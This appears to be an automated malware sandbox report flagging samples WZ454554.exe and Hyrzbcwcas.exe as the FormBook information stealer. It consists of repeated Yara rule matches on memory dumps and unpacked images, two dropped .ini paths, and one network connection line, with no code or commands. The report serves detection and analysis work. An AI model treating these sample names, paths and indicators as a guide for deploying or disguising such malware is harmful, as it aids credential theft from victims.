Source: unknown	HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.3:49751 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Detected FormBook malware

Source: C:\Windows\SysWOW64\help.exe	Dropped file: C:\Users\user\AppData\Roaming\75A8527W\75Alogri.ini			Jump to dropped file
Source: C:\Windows\SysWOW64\help.exe	Dropped file: C:\Users\user\AppData\Roaming\75A8527W\75Alogrv.ini			Jump to dropped file

Malicious sample detected (through community Yara rule)

Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.1.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 17.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 21.0.Hyrzbcwcas.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000000.360550532.00000000100E2000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.559491799.00000000030A0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.556874060.0000000002B10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.407793404.00000000005E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.418862410.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.428947591.00000000005A0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.436930793.00000000008F0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000000.419325156.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.324007988.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000000.399621636.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.436845866.00000000008C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000001.400349591.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.407506141.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000001.324511598.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.436315053.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000000.400048444.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.407725220.00000000005B0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.429108861.00000000005D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000001C.00000002.437292259.0000000002AD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.559355148.0000000003070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000001.419503342.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000000.324380363.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.431106841.0000000003000000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.428671777.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Uses 32bit PE files

Source: WZ454554.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI

Yara signature match

Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.WZ454554.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.WZ454554.exe.400000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.1.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 21.2.Hyrzbcwcas.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.0.Hyrzbcwcas.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.2.WZ454554.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.2.Hyrzbcwcas.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 9.0.WZ454554.exe.400000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
